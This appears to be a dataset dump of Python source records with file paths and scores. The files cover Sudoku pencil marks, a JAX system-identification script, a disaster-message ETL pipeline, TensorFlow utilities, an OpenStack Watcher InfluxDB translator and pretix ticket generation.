pencil_marks = [set(set({1, 2, 3, 4, 5, 6, 7, 8, 9}) - set(x)) for x in all_clues]
return pencil_marks
def get_indices_and_candidates(grid):
indices = get_indices_of_empty_cells(grid)
pencil_marks = generate_pencil_marks(grid)
return [(tuple_of_indices, candidate) for tuple_of_indices, candidate in zip(indices, pencil_marks)]
def insert_pencil_marks(grid):
indices_and_candidates = get_indices_and_candidates(grid)
for i in range(len(indices_and_candidates)):
grid[indices_and_candidates[i][0][0]][indices_and_candidates[i][0][1]] = indices_and_candidates[i][1]
return grid
print(insert_pencil_marks(example_grid)) | 0.284974 | 0.278187 |
import collections
import os
import attrdict
import jax
import jax.numpy as jnp
import jax.scipy as jsp
import numpy as np
import scipy.io
import scipy.linalg
from scipy import optimize
import riccati
jax.config.update("jax_enable_x64", True)
class Decision:
"""Decision variable specification."""
def __init__(self, shape, start):
if isinstance(shape, int):
shape = (shape,)
self.shape = shape
"""Decision variable shape."""
self.size = np.prod(shape, dtype=int)
"""Total number of elements."""
self.start = start
"""Start index in parent vector."""
end = start + self.size
self.slice = np.s_[start:end]
"""Slice of variable in parent vector."""
def unpack(self, vec):
"""Unpack variable from parent vector."""
return vec[self.slice].reshape(self.shape)
def pack(self, vec, value):
"""Pack variable into parent vector."""
val_flat = np.broadcast_to(value, self.shape).ravel()
vec[self.slice] = val_flat
class Problem:
def __init__(self, nx, u, y):
self.dec_specs = collections.OrderedDict()
"""Decision variable specifications."""
self.ndec = 0
"""Total number of decision variables."""
self.u = jnp.asarray(u)
"""Inputs."""
self.y = jnp.asarray(y)
"""Measurements."""
self.nx = nx
"""Size of state vector."""
self.nu = np.size(u, 1)
"""Size of input vector."""
self.ny = np.size(y, 1)
"""Size of output vector."""
N = np.size(y, 0)
assert N == np.size(u, 0)
self.N = N
"""Number of measurement instants."""
# Register decision variables
self.add_decision('en', (N, nx))
self.add_decision('A', (nx, nx))
self.add_decision('B', (nx, self.nu))
self.add_decision('lsQd', nx)
self.add_decision('lsRd', self.ny)
def add_decision(self, name, shape=()):
self.dec_specs[name] = spec = Decision(shape, self.ndec)
self.ndec += spec.size
def unpack_decision(self, dvec):
if jnp.shape(dvec) != (self.ndec,):
raise ValueError("invalid shape for `dvec`")
dvars = attrdict.AttrDict()
for name, spec in self.dec_specs.items():
dvars[name] = spec.unpack(dvec)
return dvars
def pack_decision(self, dvars, dvec=None):
if dvec is None:
dvec = np.zeros(self.ndec)
for name, value in dvars.items():
spec = self.dec_specs.get(name)
if spec is not None:
spec.pack(dvec, value)
return dvec
def merit(self, dvec):
v = self.unpack_decision(dvec)
en = v.en
A = v.A
B = v.B
u = self.u
y = self.y
C = jnp.identity(self.nx)
D = jnp.zeros((self.ny, self.nu))
e = en * jnp.exp(v.lsRd)
x = y - e
xprev = x[:-1]
uprev = u[:-1]
xnext = x[1:]
w = xnext - xprev @ A.T - uprev @ B.T
e = y - x @ C.T - u @ D.T
lprior = normal_logpdf(w, v.lsQd)
llike = normal_logpdf2(en, v.lsRd)
ldmarg = logdet_marg(A, C, v.lsQd, v.lsRd, self.N)
return lprior + llike + ldmarg
def normal_logpdf(x, logsigma):
"""Unnormalized normal distribution logpdf."""
N = len(x)
inv_sigma2 = jnp.exp(-2 * logsigma)
sigma_factor = - N * jnp.sum(logsigma)
return -0.5 * jnp.sum(jnp.sum(x ** 2, axis=0) * inv_sigma2) + sigma_factor
def normal_logpdf2(xn, logsigma):
"""Unnormalized normal distribution logpdf."""
N = len(xn)
sigma_factor = - N * jnp.sum(logsigma)
return -0.5 * jnp.sum(xn ** 2) + sigma_factor
def logdet_marg(A, C, lsQd, lsRd, N):
# Assemble the input matrices
sQd = jnp.exp(lsQd)
sRd = jnp.exp(lsRd)
Qd = sQd ** 2
Rd = sRd ** 2
sQ = jnp.diag(sQd)
sR = jnp.diag(sRd)
Q = jnp.diag(Qd)
R = jnp.diag(Rd)
Pp = riccati.dare(A.T, C.T, Q, R)
nx = len(A)
ny = len(C)
z = jnp.zeros_like(C.T)
sPp = jnp.linalg.cholesky(Pp)
corr_mat = jnp.block([[sR, C @ sPp],
[z, sPp]])
q, r = jnp.linalg.qr(corr_mat.T)
s = jnp.sign(r.diagonal())
sPc = (r.T * s)[ny:, ny:]
z = jnp.zeros_like(A)
pred_mat = jnp.block([[A @ sPc, sQ],
[sPc, z]])
q, r = jnp.linalg.qr(pred_mat.T)
s = jnp.sign(r.diagonal())
sPr = (r.T * s)[nx:, nx:]
eps = 1e-40
log_det_sPc = jnp.sum(jnp.log(jnp.abs(sPc.diagonal()) + eps))
log_det_sPr = jnp.sum(jnp.log(jnp.abs(sPr.diagonal()) + eps))
return (N-1) * log_det_sPr + log_det_sPc
def load_data():
# Retrieve data
d2r = np.pi / 180
module_dir = os.path.dirname(__file__)
data_file_path = os.path.join(module_dir, 'data', 'fAttasElv1.mat')
data = scipy.io.loadmat(data_file_path)['fAttasElv1'][30:-30]
t = data[:, 0] - data[0, 0]
u = data[:, [21]] * d2r
y = data[:, [7, 12]] * d2r
# Shift and rescale
yshift = np.r_[-0.003, -0.04]
yscale = np.r_[10.0, 20.0]
ushift = np.r_[-0.04]
uscale = np.r_[25.0]
y = (y + yshift) * yscale
u = (u + ushift) * uscale
# Add artificial noise
np.random.seed(0)
y[:, :] += 1e-2 * np.random.randn(*y.shape)
return t, u, y, yshift, yscale, ushift, uscale
if __name__ == '__main__':
nx = 2
nu = 1
ny = 2
# Load experiment data
t, u, y, yshift, yscale, ushift, uscale = load_data()
problem = Problem(nx, u, y)
x0 = y
en0 = np.random.randn(*y.shape)
A0 = np.diag([0.9, 0.9])
B0 = np.zeros((2, 1))
lsQd0 = np.array([-1, -1])
lsRd0 = np.array([-5, -5])
dvar0 = dict(en=en0, A=A0, B=B0, lsQd=lsQd0, lsRd=lsRd0)
dvec0 = problem.pack_decision(dvar0)
# Define optimization functions
obj = lambda x: -problem.merit(x)
grad = jax.grad(obj)
hessp = lambda x, p: jax.jvp(grad, (x,), (p,))[1]
opt = {'gtol': 2e-6, 'disp': True, 'maxiter': 200}
sol = optimize.minimize(
obj, dvec0, method='trust-krylov', jac=grad, hessp=hessp, options=opt
)
varopt = problem.unpack_decision(sol.x)
vargrad = problem.unpack_decision(sol.jac)
A = varopt.A
B = varopt.B
lsQd = varopt.lsQd
lsRd = varopt.lsRd
en = varopt.en
sRd = np.exp(lsRd)
e = en * sRd
x = y - e
xsim = np.zeros_like(x)
xsim[0] = x[0]
for i in range(1, len(x)):
xsim[i] = A @ xsim[i-1] + B @ u[i - 1] | attas_sp.py | import collections
import os
import attrdict
import jax
import jax.numpy as jnp
import jax.scipy as jsp
import numpy as np
import scipy.io
import scipy.linalg
from scipy import optimize
import riccati
jax.config.update("jax_enable_x64", True)
class Decision:
"""Decision variable specification."""
def __init__(self, shape, start):
if isinstance(shape, int):
shape = (shape,)
self.shape = shape
"""Decision variable shape."""
self.size = np.prod(shape, dtype=int)
"""Total number of elements."""
self.start = start
"""Start index in parent vector."""
end = start + self.size
self.slice = np.s_[start:end]
"""Slice of variable in parent vector."""
def unpack(self, vec):
"""Unpack variable from parent vector."""
return vec[self.slice].reshape(self.shape)
def pack(self, vec, value):
"""Pack variable into parent vector."""
val_flat = np.broadcast_to(value, self.shape).ravel()
vec[self.slice] = val_flat
class Problem:
def __init__(self, nx, u, y):
self.dec_specs = collections.OrderedDict()
"""Decision variable specifications."""
self.ndec = 0
"""Total number of decision variables."""
self.u = jnp.asarray(u)
"""Inputs."""
self.y = jnp.asarray(y)
"""Measurements."""
self.nx = nx
"""Size of state vector."""
self.nu = np.size(u, 1)
"""Size of input vector."""
self.ny = np.size(y, 1)
"""Size of output vector."""
N = np.size(y, 0)
assert N == np.size(u, 0)
self.N = N
"""Number of measurement instants."""
# Register decision variables
self.add_decision('en', (N, nx))
self.add_decision('A', (nx, nx))
self.add_decision('B', (nx, self.nu))
self.add_decision('lsQd', nx)
self.add_decision('lsRd', self.ny)
def add_decision(self, name, shape=()):
self.dec_specs[name] = spec = Decision(shape, self.ndec)
self.ndec += spec.size
def unpack_decision(self, dvec):
if jnp.shape(dvec) != (self.ndec,):
raise ValueError("invalid shape for `dvec`")
dvars = attrdict.AttrDict()
for name, spec in self.dec_specs.items():
dvars[name] = spec.unpack(dvec)
return dvars
def pack_decision(self, dvars, dvec=None):
if dvec is None:
dvec = np.zeros(self.ndec)
for name, value in dvars.items():
spec = self.dec_specs.get(name)
if spec is not None:
spec.pack(dvec, value)
return dvec
def merit(self, dvec):
v = self.unpack_decision(dvec)
en = v.en
A = v.A
B = v.B
u = self.u
y = self.y
C = jnp.identity(self.nx)
D = jnp.zeros((self.ny, self.nu))
e = en * jnp.exp(v.lsRd)
x = y - e
xprev = x[:-1]
uprev = u[:-1]
xnext = x[1:]
w = xnext - xprev @ A.T - uprev @ B.T
e = y - x @ C.T - u @ D.T
lprior = normal_logpdf(w, v.lsQd)
llike = normal_logpdf2(en, v.lsRd)
ldmarg = logdet_marg(A, C, v.lsQd, v.lsRd, self.N)
return lprior + llike + ldmarg
def normal_logpdf(x, logsigma):
"""Unnormalized normal distribution logpdf."""
N = len(x)
inv_sigma2 = jnp.exp(-2 * logsigma)
sigma_factor = - N * jnp.sum(logsigma)
return -0.5 * jnp.sum(jnp.sum(x ** 2, axis=0) * inv_sigma2) + sigma_factor
def normal_logpdf2(xn, logsigma):
"""Unnormalized normal distribution logpdf."""
N = len(xn)
sigma_factor = - N * jnp.sum(logsigma)
return -0.5 * jnp.sum(xn ** 2) + sigma_factor
def logdet_marg(A, C, lsQd, lsRd, N):
# Assemble the input matrices
sQd = jnp.exp(lsQd)
sRd = jnp.exp(lsRd)
Qd = sQd ** 2
Rd = sRd ** 2
sQ = jnp.diag(sQd)
sR = jnp.diag(sRd)
Q = jnp.diag(Qd)
R = jnp.diag(Rd)
Pp = riccati.dare(A.T, C.T, Q, R)
nx = len(A)
ny = len(C)
z = jnp.zeros_like(C.T)
sPp = jnp.linalg.cholesky(Pp)
corr_mat = jnp.block([[sR, C @ sPp],
[z, sPp]])
q, r = jnp.linalg.qr(corr_mat.T)
s = jnp.sign(r.diagonal())
sPc = (r.T * s)[ny:, ny:]
z = jnp.zeros_like(A)
pred_mat = jnp.block([[A @ sPc, sQ],
[sPc, z]])
q, r = jnp.linalg.qr(pred_mat.T)
s = jnp.sign(r.diagonal())
sPr = (r.T * s)[nx:, nx:]
eps = 1e-40
log_det_sPc = jnp.sum(jnp.log(jnp.abs(sPc.diagonal()) + eps))
log_det_sPr = jnp.sum(jnp.log(jnp.abs(sPr.diagonal()) + eps))
return (N-1) * log_det_sPr + log_det_sPc
def load_data():
# Retrieve data
d2r = np.pi / 180
module_dir = os.path.dirname(__file__)
data_file_path = os.path.join(module_dir, 'data', 'fAttasElv1.mat')
data = scipy.io.loadmat(data_file_path)['fAttasElv1'][30:-30]
t = data[:, 0] - data[0, 0]
u = data[:, [21]] * d2r
y = data[:, [7, 12]] * d2r
# Shift and rescale
yshift = np.r_[-0.003, -0.04]
yscale = np.r_[10.0, 20.0]
ushift = np.r_[-0.04]
uscale = np.r_[25.0]
y = (y + yshift) * yscale
u = (u + ushift) * uscale
# Add artificial noise
np.random.seed(0)
y[:, :] += 1e-2 * np.random.randn(*y.shape)
return t, u, y, yshift, yscale, ushift, uscale
if __name__ == '__main__':
nx = 2
nu = 1
ny = 2
# Load experiment data
t, u, y, yshift, yscale, ushift, uscale = load_data()
problem = Problem(nx, u, y)
x0 = y
en0 = np.random.randn(*y.shape)
A0 = np.diag([0.9, 0.9])
B0 = np.zeros((2, 1))
lsQd0 = np.array([-1, -1])
lsRd0 = np.array([-5, -5])
dvar0 = dict(en=en0, A=A0, B=B0, lsQd=lsQd0, lsRd=lsRd0)
dvec0 = problem.pack_decision(dvar0)
# Define optimization functions
obj = lambda x: -problem.merit(x)
grad = jax.grad(obj)
hessp = lambda x, p: jax.jvp(grad, (x,), (p,))[1]
opt = {'gtol': 2e-6, 'disp': True, 'maxiter': 200}
sol = optimize.minimize(
obj, dvec0, method='trust-krylov', jac=grad, hessp=hessp, options=opt
)
varopt = problem.unpack_decision(sol.x)
vargrad = problem.unpack_decision(sol.jac)
A = varopt.A
B = varopt.B
lsQd = varopt.lsQd
lsRd = varopt.lsRd
en = varopt.en
sRd = np.exp(lsRd)
e = en * sRd
x = y - e
xsim = np.zeros_like(x)
xsim[0] = x[0]
for i in range(1, len(x)):
xsim[i] = A @ xsim[i-1] + B @ u[i - 1] | 0.7413 | 0.398289 |
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""Loads the messages and categories data sets and merges them based
on the id.
Args:
messages_filepath (str): file path of messages csv file
categories_filepath (str): file path of categories csv file
Returns: data frame
"""
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
df = pd.merge(messages,categories,on='id')
return df
def clean_data(df):
"""Cleans the data frame for further use. The output dataframe has
one column containing the english text message and one column
for each category containing binary labels.
NOTE:
- duplicate rows are removed
- columns that have only one distinct value are removed.
Args:
df (pd.DataFrame): output of load_data()
Returns: cleaned data frame
"""
# create a dataframe of the 36 individual category columns
categories = df.categories.str.split(';',expand=True)
# select the first row of the categories dataframe
row = list(categories.iloc[0])
category_colnames = list(categories.iloc[0].apply(lambda x : x[:-2]))
categories.columns = category_colnames
# converting values to 0 and 1
for column in categories:
# set each value to be the last character of the string
categories[column] = categories[column].apply(lambda x : x[-1])
# convert column from string to numeric
categories[column] = categories[column].astype(int)
# drop old categories column and add new set of columns
df.drop(columns='categories',inplace = True)
df = pd.concat([df,categories], axis=1)
# drop duplicates
df = df.drop_duplicates()
# drop columns with only one distinct value
for col in df:
if df[col].nunique() == 1:
df.drop(columns=col, inplace=True)
print('Removed column {} since it has only 1 distinct value'.format(col))
return df
def save_data(df, database_filename):
"""Exports the input data frame as an SQL data base.
Args:
df (pd.DataFrame): data frame to be exported
database_filename (str): file path for data base
Returns: None
"""
tmp_str = 'sqlite:///{}'.format(database_filename)
engine = create_engine(tmp_str)
df.to_sql(database_filename, engine, index=False, if_exists='replace')
def main():
""" Runs the ETL pipeline """
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main() | data/process_data.py | import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""Loads the messages and categories data sets and merges them based
on the id.
Args:
messages_filepath (str): file path of messages csv file
categories_filepath (str): file path of categories csv file
Returns: data frame
"""
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
df = pd.merge(messages,categories,on='id')
return df
def clean_data(df):
"""Cleans the data frame for further use. The output dataframe has
one column containing the english text message and one column
for each category containing binary labels.
NOTE:
- duplicate rows are removed
- columns that have only one distinct value are removed.
Args:
df (pd.DataFrame): output of load_data()
Returns: cleaned data frame
"""
# create a dataframe of the 36 individual category columns
categories = df.categories.str.split(';',expand=True)
# select the first row of the categories dataframe
row = list(categories.iloc[0])
category_colnames = list(categories.iloc[0].apply(lambda x : x[:-2]))
categories.columns = category_colnames
# converting values to 0 and 1
for column in categories:
# set each value to be the last character of the string
categories[column] = categories[column].apply(lambda x : x[-1])
# convert column from string to numeric
categories[column] = categories[column].astype(int)
# drop old categories column and add new set of columns
df.drop(columns='categories',inplace = True)
df = pd.concat([df,categories], axis=1)
# drop duplicates
df = df.drop_duplicates()
# drop columns with only one distinct value
for col in df:
if df[col].nunique() == 1:
df.drop(columns=col, inplace=True)
print('Removed column {} since it has only 1 distinct value'.format(col))
return df
def save_data(df, database_filename):
"""Exports the input data frame as an SQL data base.
Args:
df (pd.DataFrame): data frame to be exported
database_filename (str): file path for data base
Returns: None
"""
tmp_str = 'sqlite:///{}'.format(database_filename)
engine = create_engine(tmp_str)
df.to_sql(database_filename, engine, index=False, if_exists='replace')
def main():
""" Runs the ETL pipeline """
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main() | 0.630912 | 0.553867 |
import sys
import os
import re
import numpy as np
import tensorflow as tf
def print_(str, colour='', bold=False):
if colour == 'w': # yellow warning
sys.stdout.write('\033[93m')
elif colour == "e": # red error
sys.stdout.write('\033[91m')
elif colour == "m": # magenta info
sys.stdout.write('\033[95m')
if bold:
sys.stdout.write('\033[1m')
sys.stdout.write(str)
sys.stdout.write('\033[0m')
sys.stdout.flush()
def get_filepaths_from_dir(dir_path):
"""Recursively walk through the given directory and return a list of file paths
"""
data_list = []
for (root, directories, filenames) in os.walk(dir_path):
directories.sort()
filenames.sort()
for filename in filenames:
data_list += [os.path.join(root,filename)]
return data_list
def get_labels_from_dir(dir_path):
"""Return classification class labels (= first subdirectories names)
"""
labels_list = []
for (root, directories, filenames) in os.walk(dir_path):
directories.sort()
labels_list += directories
# Break to only keep the top directory
break
# Remove '.' in folder names for label retrieval in model.py
labels_list = [''.join(label.split('.')) for label in labels_list]
return labels_list
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(text):
"""Use mylist.sort(key=natural_keys) to sort mylist in human order
"""
return [atoi(c) for c in re.split(r'(\d+)', text)]
def get_saved_model_list(ckpt_dir):
"""Return a list of HDF5 models found in ckpt_dir
"""
filenames_list = []
for (root, directories, filenames) in os.walk(ckpt_dir):
filenames_list += filenames
# Break to only keep the top directory
break
ckpt_list = []
for filename in filenames_list:
if filename.endswith(('.h5', '.hdf5')):
ckpt_list += [filename]
ckpt_list.sort(key=natural_keys)
return ckpt_list
def im2uint8(x):
if x.__class__ == tf.Tensor:
return tf.cast(tf.clip_by_value(x, 0.0, 1.0) * 255.0, tf.uint8)
else:
t = np.clip(x, 0.0, 1.0) * 255.0
return t.astype(np.uint8) | Models/classTemplateTF/util/util.py | import sys
import os
import re
import numpy as np
import tensorflow as tf
def print_(str, colour='', bold=False):
if colour == 'w': # yellow warning
sys.stdout.write('\033[93m')
elif colour == "e": # red error
sys.stdout.write('\033[91m')
elif colour == "m": # magenta info
sys.stdout.write('\033[95m')
if bold:
sys.stdout.write('\033[1m')
sys.stdout.write(str)
sys.stdout.write('\033[0m')
sys.stdout.flush()
def get_filepaths_from_dir(dir_path):
"""Recursively walk through the given directory and return a list of file paths
"""
data_list = []
for (root, directories, filenames) in os.walk(dir_path):
directories.sort()
filenames.sort()
for filename in filenames:
data_list += [os.path.join(root,filename)]
return data_list
def get_labels_from_dir(dir_path):
"""Return classification class labels (= first subdirectories names)
"""
labels_list = []
for (root, directories, filenames) in os.walk(dir_path):
directories.sort()
labels_list += directories
# Break to only keep the top directory
break
# Remove '.' in folder names for label retrieval in model.py
labels_list = [''.join(label.split('.')) for label in labels_list]
return labels_list
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(text):
"""Use mylist.sort(key=natural_keys) to sort mylist in human order
"""
return [atoi(c) for c in re.split(r'(\d+)', text)]
def get_saved_model_list(ckpt_dir):
"""Return a list of HDF5 models found in ckpt_dir
"""
filenames_list = []
for (root, directories, filenames) in os.walk(ckpt_dir):
filenames_list += filenames
# Break to only keep the top directory
break
ckpt_list = []
for filename in filenames_list:
if filename.endswith(('.h5', '.hdf5')):
ckpt_list += [filename]
ckpt_list.sort(key=natural_keys)
return ckpt_list
def im2uint8(x):
if x.__class__ == tf.Tensor:
return tf.cast(tf.clip_by_value(x, 0.0, 1.0) * 255.0, tf.uint8)
else:
t = np.clip(x, 0.0, 1.0) * 255.0
return t.astype(np.uint8) | 0.355216 | 0.154089 |
from oslo_config import cfg
from oslo_log import log
from oslo_serialization import jsonutils
from watcher.common import exception
from watcher.decision_engine.datasources.grafana_translator.base import \
BaseGrafanaTranslator
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class InfluxDBGrafanaTranslator(BaseGrafanaTranslator):
"""Grafana translator to communicate with InfluxDB database"""
NAME = 'influxdb'
def __init__(self, data):
super(InfluxDBGrafanaTranslator, self).__init__(data)
def build_params(self):
""""""
data = self._data
retention_period = None
available_periods = CONF.grafana_translators.retention_periods.items()
for key, value in sorted(available_periods, key=lambda x: x[1]):
if int(data['period']) < int(value):
retention_period = key
break
if retention_period is None:
retention_period = max(available_periods)[0]
LOG.warning("Longest retention period is to short for desired"
" period")
try:
resource = self._extract_attribute(
data['resource'], data['attribute'])
except AttributeError:
LOG.error("Resource: {0} does not contain attribute {1}".format(
data['resource'], data['attribute']))
raise
# Granularity is optional if it is None the minimal value for InfluxDB
# will be 1
granularity = \
data['granularity'] if data['granularity'] is not None else 1
return {'db': data['db'],
'epoch': 'ms',
'q': self._query_format(
data['query'], data['aggregate'], resource, data['period'],
granularity, retention_period)}
def extract_result(self, raw_results):
""""""
try:
# For result structure see:
# https://docs.openstack.org/watcher/latest/datasources/grafana.html#InfluxDB
result = jsonutils.loads(raw_results)
result = result['results'][0]['series'][0]
index_aggregate = result['columns'].index(self._data['aggregate'])
return result['values'][0][index_aggregate]
except KeyError:
LOG.error("Could not extract {0} for the resource: {1}".format(
self._data['metric'], self._data['resource']))
raise exception.NoSuchMetricForHost(
metric=self._data['metric'], host=self._data['resource']) | watcher/decision_engine/datasources/grafana_translator/influxdb.py |
from oslo_config import cfg
from oslo_log import log
from oslo_serialization import jsonutils
from watcher.common import exception
from watcher.decision_engine.datasources.grafana_translator.base import \
BaseGrafanaTranslator
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class InfluxDBGrafanaTranslator(BaseGrafanaTranslator):
"""Grafana translator to communicate with InfluxDB database"""
NAME = 'influxdb'
def __init__(self, data):
super(InfluxDBGrafanaTranslator, self).__init__(data)
def build_params(self):
""""""
data = self._data
retention_period = None
available_periods = CONF.grafana_translators.retention_periods.items()
for key, value in sorted(available_periods, key=lambda x: x[1]):
if int(data['period']) < int(value):
retention_period = key
break
if retention_period is None:
retention_period = max(available_periods)[0]
LOG.warning("Longest retention period is to short for desired"
" period")
try:
resource = self._extract_attribute(
data['resource'], data['attribute'])
except AttributeError:
LOG.error("Resource: {0} does not contain attribute {1}".format(
data['resource'], data['attribute']))
raise
# Granularity is optional if it is None the minimal value for InfluxDB
# will be 1
granularity = \
data['granularity'] if data['granularity'] is not None else 1
return {'db': data['db'],
'epoch': 'ms',
'q': self._query_format(
data['query'], data['aggregate'], resource, data['period'],
granularity, retention_period)}
def extract_result(self, raw_results):
""""""
try:
# For result structure see:
# https://docs.openstack.org/watcher/latest/datasources/grafana.html#InfluxDB
result = jsonutils.loads(raw_results)
result = result['results'][0]['series'][0]
index_aggregate = result['columns'].index(self._data['aggregate'])
return result['values'][0][index_aggregate]
except KeyError:
LOG.error("Could not extract {0} for the resource: {1}".format(
self._data['metric'], self._data['resource']))
raise exception.NoSuchMetricForHost(
metric=self._data['metric'], host=self._data['resource']) | 0.503418 | 0.252908 |
import logging
import os
from django.core.files.base import ContentFile
from django.utils.timezone import now
from django.utils.translation import gettext as _
from django_scopes import scopes_disabled
from pretix.base.i18n import language
from pretix.base.models import (
CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, Order,
OrderPosition,
)
from pretix.base.services.tasks import EventTask, ProfiledTask
from pretix.base.settings import PERSON_NAME_SCHEMES
from pretix.base.signals import allow_ticket_download, register_ticket_outputs
from pretix.celery_app import app
from pretix.helpers.database import rolledback_transaction
logger = logging.getLogger(__name__)
def generate_orderposition(order_position: int, provider: str):
order_position = OrderPosition.objects.select_related('order', 'order__event').get(id=order_position)
with language(order_position.order.locale, order_position.order.event.settings.region):
responses = register_ticket_outputs.send(order_position.order.event)
for receiver, response in responses:
prov = response(order_position.order.event)
if prov.identifier == provider:
filename, ttype, data = prov.generate(order_position)
path, ext = os.path.splitext(filename)
for ct in CachedTicket.objects.filter(order_position=order_position, provider=provider):
ct.delete()
ct = CachedTicket.objects.create(order_position=order_position, provider=provider,
extension=ext, type=ttype, file=None)
ct.file.save(filename, ContentFile(data))
return ct.pk
def generate_order(order: int, provider: str):
order = Order.objects.select_related('event').get(id=order)
with language(order.locale, order.event.settings.region):
responses = register_ticket_outputs.send(order.event)
for receiver, response in responses:
prov = response(order.event)
if prov.identifier == provider:
filename, ttype, data = prov.generate_order(order)
if ttype == 'text/uri-list':
continue
path, ext = os.path.splitext(filename)
for ct in CachedCombinedTicket.objects.filter(order=order, provider=provider):
ct.delete()
ct = CachedCombinedTicket.objects.create(order=order, provider=provider, extension=ext,
type=ttype, file=None)
ct.file.save(filename, ContentFile(data))
return ct.pk
@app.task(base=ProfiledTask)
def generate(model: str, pk: int, provider: str):
with scopes_disabled():
if model == 'order':
return generate_order(pk, provider)
elif model == 'orderposition':
return generate_orderposition(pk, provider)
class DummyRollbackException(Exception):
pass
def preview(event: int, provider: str):
event = Event.objects.get(id=event)
with rolledback_transaction(), language(event.settings.locale, event.settings.region):
item = event.items.create(name=_("Sample product"), default_price=42.23,
description=_("Sample product description"))
item2 = event.items.create(name=_("Sample workshop"), default_price=23.40)
from pretix.base.models import Order
order = event.orders.create(status=Order.STATUS_PENDING, datetime=now(),
email='<EMAIL>',
locale=event.settings.locale,
expires=now(), code="PREVIEW1234", total=119)
scheme = PERSON_NAME_SCHEMES[event.settings.name_scheme]
sample = {k: str(v) for k, v in scheme['sample'].items()}
p = order.positions.create(item=item, attendee_name_parts=sample, price=item.default_price)
s = event.subevents.first()
order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
InvoiceAddress.objects.create(order=order, name_parts=sample, company=_("Sample company"))
responses = register_ticket_outputs.send(event)
for receiver, response in responses:
prov = response(event)
if prov.identifier == provider:
return prov.generate(p)
def get_tickets_for_order(order, base_position=None):
can_download = all([r for rr, r in allow_ticket_download.send(order.event, order=order)])
if not can_download:
return []
if not order.ticket_download_available:
return []
providers = [
response(order.event)
for receiver, response
in register_ticket_outputs.send(order.event)
]
tickets = []
positions = list(order.positions_with_tickets)
if base_position:
# Only the given position and its children
positions = [
p for p in positions if p.pk == base_position.pk or p.addon_to_id == base_position.pk
]
for p in providers:
if not p.is_enabled:
continue
if p.multi_download_enabled and not base_position:
try:
if len(positions) == 0:
continue
ct = CachedCombinedTicket.objects.filter(
order=order, provider=p.identifier, file__isnull=False
).last()
if not ct or not ct.file:
retval = generate_order(order.pk, p.identifier)
if not retval:
continue
ct = CachedCombinedTicket.objects.get(pk=retval)
tickets.append((
"{}-{}-{}{}".format(
order.event.slug.upper(), order.code, ct.provider, ct.extension,
),
ct
))
except:
logger.exception('Failed to generate ticket.')
else:
for pos in positions:
try:
ct = CachedTicket.objects.filter(
order_position=pos, provider=p.identifier, file__isnull=False
).last()
if not ct or not ct.file:
retval = generate_orderposition(pos.pk, p.identifier)
if not retval:
continue
ct = CachedTicket.objects.get(pk=retval)
if ct.type == 'text/uri-list':
continue
if pos.subevent:
# Subevent date in filename improves accessibility e.g. for screen reader users
fname = "{}-{}-{}-{}-{}{}".format(
order.event.slug.upper(), order.code, pos.positionid,
pos.subevent.date_from.strftime('%Y_%m_%d'),
ct.provider, ct.extension
)
else:
fname = "{}-{}-{}-{}{}".format(
order.event.slug.upper(), order.code, pos.positionid,
ct.provider, ct.extension
)
tickets.append((
fname,
ct
))
except:
logger.exception('Failed to generate ticket.')
return tickets
@app.task(base=EventTask, acks_late=True)
def invalidate_cache(event: Event, item: int=None, provider: str=None, order: int=None, **kwargs):
qs = CachedTicket.objects.filter(order_position__order__event=event)
qsc = CachedCombinedTicket.objects.filter(order__event=event)
if item:
qs = qs.filter(order_position__item_id=item)
if provider:
qs = qs.filter(provider=provider)
qsc = qsc.filter(provider=provider)
if order:
qs = qs.filter(order_position__order_id=order)
qsc = qsc.filter(order_id=order)
for ct in qs:
ct.delete()
for ct in qsc:
ct.delete() | src/pretix/base/services/tickets.py | import logging
import os
from django.core.files.base import ContentFile
from django.utils.timezone import now
from django.utils.translation import gettext as _
from django_scopes import scopes_disabled
from pretix.base.i18n import language
from pretix.base.models import (
CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, Order,
OrderPosition,
)
from pretix.base.services.tasks import EventTask, ProfiledTask
from pretix.base.settings import PERSON_NAME_SCHEMES
from pretix.base.signals import allow_ticket_download, register_ticket_outputs
from pretix.celery_app import app
from pretix.helpers.database import rolledback_transaction
logger = logging.getLogger(__name__)
def generate_orderposition(order_position: int, provider: str):
order_position = OrderPosition.objects.select_related('order', 'order__event').get(id=order_position)
with language(order_position.order.locale, order_position.order.event.settings.region):
responses = register_ticket_outputs.send(order_position.order.event)
for receiver, response in responses:
prov = response(order_position.order.event)
if prov.identifier == provider:
filename, ttype, data = prov.generate(order_position)
path, ext = os.path.splitext(filename)
